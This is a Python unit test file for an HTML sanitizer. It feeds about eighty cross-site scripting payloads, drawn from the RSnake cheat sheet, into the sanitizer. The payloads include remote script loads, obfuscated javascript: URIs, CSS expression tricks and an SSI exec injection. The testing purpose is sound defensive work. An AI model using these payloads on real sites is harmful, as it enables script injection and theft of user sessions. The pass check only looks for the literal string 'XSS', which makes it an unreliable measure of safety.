
from sanitizer import Sanitizer
import unittest, re

class TestSanitizer(unittest.TestCase):

    def setUp(self):
        self.sanitizer = Sanitizer()

    def output(self, id, html, safehtml):
        print "=========== Test %s ===============\n" %id
        print ">>>\n%s" %html
        print "<<<\n%s" %safehtml

    def containsXSS(self,html):
        if re.search('XSS', html):
            return True
        else:
            return False

    def test_xss_2(self):
        html = """<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(2, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_3(self):
        html = """<IMG SRC=\"javascript:alert('XSS');\">"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(3, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_4(self):
        html = """<IMG SRC=javascript:alert('XSS')>"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(4, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_5(self):
        html = """<IMG SRC=JaVaScRiPt:alert('XSS')>"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(5, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_6(self):
        html = """<IMG SRC=javascript:alert(&quot;XSS&quot;)>"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(6, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_7(self):
        html = """<IMG SRC=`javascript:alert(\"RSnake says, 'XSS'\")`>"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(7, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_8(self):
        html = """<IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(8, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_9(self):
        html = """<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(9, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_a10(self):
        html = """<IMG SRC=&#x26;&#x23;&#x31;&#x30;&#x36;&#x3B;&#x26;&#x23;&#x39;&#x37;&#x3B;&#x26;&#x23;&#x31;&#x31;&#x38;&#x3B;&#x26;&#x23;&#x39;&#x37;&#x3B;&#x26;&#x23;&#x31;&#x31;&#x35;&#x3B;&#x26;&#x23;&#x39;&#x39;&#x3B;&#x26;&#x23;&#x31;&#x31;&#x34;&#x3B;&#x26;&#x23;&#x31;&#x30;&#x35;&#x3B;&#x26;&#x23;&#x31;&#x31;&#x32;&#x3B;&#x26;&#x23;&#x31;&#x31;&#x36;&#x3B;&#x26;&#x23;&#x35;&#x38;&#x3B;&#x26;&#x23;&#x39;&#x37;&#x3B;&#x26;&#x23;&#x31;&#x30;&#x38;&#x3B;&#x26;&#x23;&#x31;&#x30;&#x31;&#x3B;&#x26;&#x23;&#x31;&#x31;&#x34;&#x3B;&#x26;&#x23;&#x31;&#x31;&#x36;&#x3B;&#x26;&#x23;&#x34;&#x30;&#x3B;&#x26;&#x23;&#x33;&#x39;&#x3B;&#x26;&#x23;&#x38;&#x38;&#x3B;&#x26;&#x23;&#x38;&#x33;&#x3B;&#x26;&#x23;&#x38;&#x33;&#x3B;&#x26;&#x23;&#x33;&#x39;&#x3B;&#x26;&#x23;&#x34;&#x31;&#x3B;>"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output('a10', html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_10(self):
        html = """<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(10, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_11(self):
        html = """<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(11, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_12(self):
        html = """<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(12, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_13(self):
        html = """<IMG SRC=\"jav	ascript:alert('XSS');\">"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(13, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_14(self):
        html = """<IMG SRC=\"jav&#x09;ascript:alert('XSS');\">"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(14, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_15(self):
        html = """<IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(15, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_16(self):
        html = """<IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(16, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_17(self):
        html = """<IMG
SRC
=
\"
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
'
X
S
S
'
)
\"
>
"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(17, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_20(self):
        html = """<IMG SRC=\" &#14;  javascript:alert('XSS');\">"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(20, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_21(self):
        html = """<SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(21, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_22(self):
        html = """<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(\"XSS\")>"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(22, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_23(self):
        html = """<SCRIPT/SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(23, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_24(self):
        html = """<<SCRIPT>alert(\"XSS\");//<</SCRIPT>"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(24, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_25(self):
        html = """<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(25, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_26(self):
        html = """<SCRIPT SRC=//ha.ckers.org/.j>"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(26, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_27(self):
        html = """<IMG SRC=\"javascript:alert('XSS')\""""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(27, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_28(self):
        html = """<iframe src=http://ha.ckers.org/scriptlet.html <"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(28, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_30(self):
        html = """</TITLE><SCRIPT>alert(\"XSS\");</SCRIPT>"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(30, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_31(self):
        html = """<INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\">"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(31, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_32(self):
        html = """<BODY BACKGROUND=\"javascript:alert('XSS')\">"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(32, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_33(self):
        html = """<BODY ONLOAD=alert('XSS')>"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(33, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_34(self):
        html = """<IMG DYNSRC=\"javascript:alert('XSS')\">"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(34, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_35(self):
        html = """<IMG LOWSRC=\"javascript:alert('XSS')\">"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(35, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_36(self):
        html = """<BGSOUND SRC=\"javascript:alert('XSS');\">"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(36, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_37(self):
        html = """<BR SIZE=\"&{alert('XSS')}\">"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(37, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_38(self):
        html = """<LAYER SRC=\"http://ha.ckers.org/scriptlet.html\"></LAYER>"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(38, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_39(self):
        html = """<LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(39, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_40(self):
        html = """<LINK REL=\"stylesheet\" HREF=\"http://ha.ckers.org/xss.css\">"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(40, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_41(self):
        html = """<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(41, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_42(self):
        html = """<META HTTP-EQUIV=\"Link\" Content=\"<http://ha.ckers.org/xss.css>; REL=stylesheet\">"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(42, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_43(self):
        html = """<STYLE>BODY{-moz-binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}</STYLE>"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(43, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_44(self):
        html = """<XSS STYLE=\"behavior: url(xss.htc);\">"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(44, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_45(self):
        html = """<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>elem"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(45, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_46(self):
        html = """<IMG SRC='vbscript:msgbox(\"XSS\")'>"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(46, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_47(self):
        html = """<IMG SRC=\"mocha:[code]\">"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(47, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_48(self):
        html = """<IMG SRC=\"livescript:[code]\">"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(48, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_50(self):
        html = """<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(50, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_51(self):
        html = """<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\">"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(51, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_52(self):
        html = """<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(52, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_53(self):
        html = """<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(53, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_54(self):
        html = """<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(54, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_55(self):
        html = """<TABLE BACKGROUND=\"javascript:alert('XSS')\">"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(55, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_56(self):
        html = """<TABLE><TD BACKGROUND=\"javascript:alert('XSS')\">"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(56, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_57(self):
        html = """<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(57, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_58(self):
        html = """<DIV STYLE=\"background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029\">"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(58, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_59(self):
        html = """<DIV STYLE=\"background-image: url(&#1;javascript:alert('XSS'))\">"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(59, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_60(self):
        html = """<DIV STYLE=\"width: expression(alert('XSS'));\">"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(60, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_61(self):
        html = """<STYLE>@im\port'\ja\vasc\ript:alert(\"XSS\")';</STYLE>"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(61, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_62(self):
        html = """<IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(62, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_63(self):
        html = """<XSS STYLE=\"xss:expression(alert('XSS'))\">"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(63, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_64(self):
        html = """<STYLE TYPE=\"text/javascript\">alert('XSS');</STYLE>"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(64, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_65(self):
        html = """<STYLE>.XS{background-image:url(\"javascript:alert('XSS')\");}</STYLE><A CLASS=XS></A>"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(65, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_66(self):
        html = """<STYLE type=\"text/css\">BODY{background:url(\"javascript:alert('XSS')\")}</STYLE>"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(66, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_67(self):
        html = """<BASE HREF=\"javascript:alert('XSS');//\">"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(67, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_68(self):
        html = """<OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://ha.ckers.org/scriptlet.html\"></OBJECT>"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(68, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_69(self):
        html = """<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(69, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_70(self):
        html = """<EMBED SRC=\"http://ha.ckers.org/xss.swf\" AllowScriptAccess=\"always\"></EMBED>"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(70, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_71(self):
        html = """<EMBED SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"></EMBED>"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(71, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_73(self):
        html = """<SCRIPT SRC=\"http://ha.ckers.org/xss.jpg\"></SCRIPT>"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(73, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_74(self):
        html = """<!--#exec cmd=\"/bin/echo '<SCR'\"--><!--#exec cmd=\"/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'\"-->"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(74, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_75(self):
        html = """<IMG SRC=\"http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\">"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(75, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_77(self):
        html = """<META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;\">"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(77, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_79(self):
        html = """<SCRIPT a=\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(79, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_80(self):
        html = """<SCRIPT =\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(80, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_81(self):
        html = """<SCRIPT a=\">\" '' SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(81, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_82(self):
        html = """<SCRIPT \"a='>'\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(82, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_83(self):
        html = """<SCRIPT a=`>` SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(83, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_84(self):
        html = """<SCRIPT a=\">'>\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(84, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_85(self):
        html = """<SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(85, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

    def test_xss_98(self):
        html = """<A HREF=\"javascript:document.location='http://www.google.com/'\">XSS</A>"""
        safehtml = self.sanitizer.sanitizeHtml(html)
        self.output(98, html,safehtml)
        self.assertFalse(self.containsXSS(safehtml))

if __name__ == '__main__':
    unittest.main()
